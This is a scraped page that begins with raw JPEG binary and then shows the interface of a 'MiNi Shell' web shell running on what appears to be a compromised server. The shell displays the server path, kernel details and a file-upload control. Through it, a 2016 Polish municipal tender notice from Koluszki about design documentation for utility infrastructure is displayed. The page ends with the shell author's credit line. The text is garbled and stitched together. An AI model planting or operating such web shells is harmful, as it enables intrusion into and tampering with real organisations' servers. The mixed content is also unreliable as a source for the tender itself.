JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160304/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160304/49240-N-2016.html

<p class="kh_header"><b>Koluszki: Wykonanie dokumentacji projektowych na uzbrojenie terenów Łódzkiej Specjalnej Strefy Ekonomicznej - Podstrefy Koluszki</b><br>
<b>Numer ogłoszenia: 49240 - 2016; data zamieszczenia: 04.03.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Koluszkach , ul. 11-go Listopada 65, 95-040 Koluszki, woj. łódzkie, tel. 044 7256700, faks 044 7145840.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.koluszki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowych na uzbrojenie terenów Łódzkiej Specjalnej Strefy Ekonomicznej - Podstrefy Koluszki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem  niniejszego zamówienia jest opracowanie koncepcji, a następnie wykonanie  dokumentacji  projektowo - kosztorysowej  na kompleksowe uzbrojenie terenów inwestycyjnych o powierzchni ogółem ok. 23 ha, położonych w obrębie ewidencyjnym Nr 2 i 3 miasta Koluszki. Tereny  inwestycyjne  położone są w Koluszkach przy ulicach: Polnej, Czarneckiego oraz Zielonej. Właścicielem tych działek jest Gmina Koluszki.
Realizacja tej  inwestycji  ma na celu przygotowanie terenu, doprowadzenie niezbędnej infrastruktury  drogowej oraz mediów, tak aby w przyszłości mogły tu powstać i prowadzić swoją działalność zakłady  produkcyjno - usługowo- handlowe. 
2. Zakres prac będący przedmiotem zamówienia obejmuje: 
1) opracowanie map geodezyjnych do celów  projektowych. 
2) opracowanie  dokumentacji geologicznej określającej warunki gruntowo - wodne oraz geotechniczne warunki posadowienia obiektów budowlanych dla w/w działek 
3) uzyskanie warunków technicznych i uzgodnienie przebiegu uzbrojenie podziemnego 
i  naziemnego z gestorami urządzeń,
4) opracowanie i przedłożenie Zamawiającemu do zatwierdzenia projektu koncepcyjnego obejmującego: 
a) budowę sieci kanalizacji deszczowej, 
b) budowę sieci kanalizacji sanitarnej, 
c) budowę sieci  wodociągowej, 
d) przebudowę istniejących nawierzchni dróg wewnętrznych, ulicy Zielonej i Czarneckiego oraz skrzyżowań  ul. Polnej i Zielonej, ul. Zielonej i Czarneckiego,  Czarneckiego i  3 Maja w Koluszkach oraz budowę nowych  dróg wewnętrznych  
( komunikacyjnych) dla  potrzeb obsługi terenów  inwestycyjnych,
e) budowę oświetlenia ulicznego,
f) usunięcie kolizji napowietrznych i kablowych linii  elektroenergetycznych  wysokiego 
i średniego napięcia  przebiegających przez tereny w/w działek, kolidujących 
z zagospodarowaniem terenów inwestycyjnych.
5) Na bazie sporządzonego przez Wykonawcę a zatwierdzonego przez Zamawiającego  projektu koncepcyjnego, Wykonawca zobowiązany będzie do wykonania  dokumentacji  projektowo - kosztorysowej obejmującej: 
a) budowę sieci  kanalizacji deszczowej, 
b) budowę sieci kanalizacji sanitarnej, 
c) budowę sieci wodociągowej, 
d) przebudowę istniejących nawierzchni dróg  wewnętrznych, ulicy Zielonej i Czarneckiego  oraz skrzyżowań  ul. Polnej i  Zielonej, ul. Zielonej i Czarneckiego, Czarneckiego i 3 Maja w Koluszkach oraz budowę nowych  dróg wewnętrznych  
( komunikacyjnych) dla potrzeb obsługi terenów inwestycyjnych,
e) budowę oświetlenia ulicznego,
f) usunięcie kolizji napowietrznych i  kablowych  linii  elektroenergetycznych przebiegających przez tereny w/w działek, kolidujących z zagospodarowaniem terenów inwestycyjnych
g) makroniwelację  terenów  położonych w strefie inwestycyjnej  oraz  terenów bezpośrednio przyległych. 
h) usunięcie istniejących drzew, 
i) wykonanie projektu tymczasowej  organizacji ruchu na czas wykonywania  robót, 
j) wykonanie projektu stałej (docelowej)  organizacji  ruchu. 
6) pełnienie nadzoru autorskiego nad wykonaną  dokumentacją  projektową..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.01.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna  ten warunek  za spełniony na podstawie  podpisanych  oświadczeń:  o  spełnieniu  warunków  udziału w  postępowaniu, o których  mowa w art. 22 ust. 1 i braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 Ustawy Prawo  Zamówień  Publicznych, oraz gdy Wykonawca załączy aktualny odpis z właściwego rejestru lub Centralnej Ewidencji i Informacji o Działalności Gospodarczej Rzeczpospolitej Polskiej, jeżeli odrębne przepisy wymagają  wpisu do  rejestru lub ewidencji wystawionego nie wcześniej niż 6 miesięcy przed upływem  terminu  składania ofert.  
Ocena spełnienia warunków będzie dokonywana na podstawie złożonych dokumentów i oświadczeń.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony na  podstawie  podpisanego oświadczenia o spełnieniu warunków udziału  w postępowaniu, o których mowa w art. 22 ust. 1   Ustawy  Prawo  Zamówień  Publicznych oraz gdy Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest  krótszy -w tym okresie, zrealizował minimum:
a) dwa projekty wielobranżowe zawierające: przebudowę nawierzchni dróg wraz 
z  budową kanalizacji sanitarnej lub kanalizacji deszczowej o wartości brutto nie mniejszej niż: 120.000,00 PLN  słownie: sto dwadzieścia tysięcy złotych (każda realizacja), oraz, 
b) dwie dokumentacje projektowe związane z budową, przebudową linii energetycznych: średniego lub wysokiego napięcia.     
Do  realizacji ujętych w  punkcie a i b należy podać ich: wartość, przedmiot, daty wykonania  i podmioty, na rzecz  których  usługi  zostały wykonane, oraz załączeniem dowodów czy zostały wykonane lub są wykonywane  należycie.
Usługi opisane w punktach a i b mogły  być wykonywane  przez Wykonawcę  łącznie (przebudowa nawierzchni dróg wraz z budową kanalizacji sanitarnej lub kanalizacji deszczowej oraz z: budową, przebudową linii energetycznych: średniego lub wysokiego napięcia) lub realizacje związane z budową, przebudową linii energetycznych: średniego lub wysokiego napięcia mogły być zrealizowane w odrębnych niezależnych zadaniach.
Ocena  spełnienia warunków  będzie dokonywana  na  podstawie złożonych dokumentów i oświadczeń.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna  ten warunek za spełniony na  podstawie  podpisanego  oświadczenia o spełnieniu warunków udziału w postępowaniu, o których mowa  w art. 22 ust. 1 Ustawy Prawo Zamówień Publicznych.
Ocena spełnienia warunków będzie dokonywana na podstawie złożonych dokumentów i oświadczeń.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna  ten  warunek  za  spełniony na podstawie podpisanego  oświadczenia o spełnieniu warunków udziału w  postępowaniu, o których mowa w art. 22 ust. 1 Ustawy  Prawo Zamówień Publicznych, oraz gdy  Wykonawca  dysponuje osobami, które będą uczestniczyć w wykonaniu  zamówienia i które posiadają aktualne uprawnienia budowlane do projektowania w specjalnościach:  
a) drogowej,
b) instalacyjnej w zakresie sieci i urządzeń  wodociągowo - kanalizacyjnych.
c) instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, bez ograniczeń  zgodnie z art. 12 a ustawy z  dnia 7 lipca 1994 r. Prawo budowlane ( Dz. U. z 2010 r. Nr 243 poz.1623 z późniejszymi zmianami). 
Ocena spełnienia warunków będzie dokonywana na podstawie złożonych dokumentów 
i oświadczeń.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony na podstawie podpisanego oświadczenia o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 Ustawy Prawo Zamówień Publicznych.
Ocena spełnienia warunków będzie dokonywana na podstawie złożonych dokumentów 
i oświadczeń.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Wypełniony formularz oferty 
2) Wypełniony formularz cen jednostkowych 
3) W przypadku, gdy Wykonawca będzie polegał na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków zobowiązany jest przedstawić pisemne zobowiązanie tych podmiotów do oddania mu  do dyspozycji niezbędnych  zasobów na  potrzeby wykonywania zamówienia.
4) W przypadku, gdy podmioty występują  wspólnie Wykonawcy  powinni ustanowić  pełnomocnika  do reprezentowania ich w  postępowaniu o udzielenie zamówienia, albo  reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 99</li>
<li>2 - Skrócenie terminu wykonania dokumentacji projektowej - 1</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający dopuszcza zmianę postanowień zawartej umowy w stosunku do treści  oferty, na podstawie której dokonano wyboru Wykonawcy w następujących przypadkach:
1) w uzasadnionych przypadkach  niezależnych od Zamawiającego  lub  Wykonawcy,  
a w szczególności: 
a) działania  siły wyższej, uniemożliwiającej  wykonanie umowy w umówionym terminie o okres niezbędny  do usunięcia skutków działania siły wyższej.
b) wystąpienia  niezależnego od  wykonawcy  przedłużenia się  terminu  pozyskiwania  uzgodnień oraz warunków  do projektowania od: dysponentów mediów  i  innych  właściwych organów i instytucji - o najdłuższy okres czasu  przez  jaki  okoliczności  te wystąpiły,
c) przedłużenia się pozyskiwania wszelkich  uzgodnień i decyzji niezbędnych do otrzymania koniecznych uzgodnień i pozwolenia na budowę  trwającego ponad dwa miesiące od daty złożenia poszczególnych opracowań  lub dokumentów do uzgodnienia we właściwej instytucji - o okres czasu opóźnienia otrzymania koniecznych uzgodnień i  pozwolenia na budowę, kiedy konieczna będzie zmiana terminu realizacji  zamówienia, Zamawiający na pisemny wniosek Wykonawcy może wydłużyć  termin  realizacji tego zamówienia,
2) w innych uzasadnionych przypadkach, gdy zajdzie konieczność wprowadzenia  do  umowy koniecznych zmian wynikających z okoliczności, których nie można było przewidzieć w chwili zawarcia  umowy a w szczególności zmiany  Projektantów,  Zamawiający  za zgodą lub  na wniosek Wykonawcy może  dokonać  takiej  zmiany. 
3) w przypadku, gdy zmiany postanowień zawartej  umowy będą korzystne dla Zamawiającego, a zmiany te wynikły w trakcie realizacji zamówienia, Zamawiający  za zgodą Wykonawcy może dokonać takiej  zmiany.
4) w przypadku ustawowej zmiany stawki  podatku  od  towarów  i usług (VAT)  cena  netto pozostanie bez  zmian, a kwota  podatku VAT  i  wartość  brutto zostanie odpowiednio  skorygowana zgodnie z aktualnie  obowiązującymi  przepisami  podatkowymi.
5) zmiany podmiotu trzeciego (podwykonawcy na  etapie realizacji zamówienia), a  nowy podwykonawca wykaże spełnianie warunków w zakresie nie mniejszym niż wskazany na  etapie postępowania o zamówienie publiczne dotychczasowy podwykonawca.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.koluszki.samorzady.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Koluszkach przy ul 11 Listopada 65 pok nr 203.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.03.2016 godzina 09:30, miejsce: kancelaria Urzędu Miejskiego w Koluszkach przy ul 11 Listopada 65.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Gmina Koluszki ubiega się o uzyskanie dofinansowania zadania ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2014-2020.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com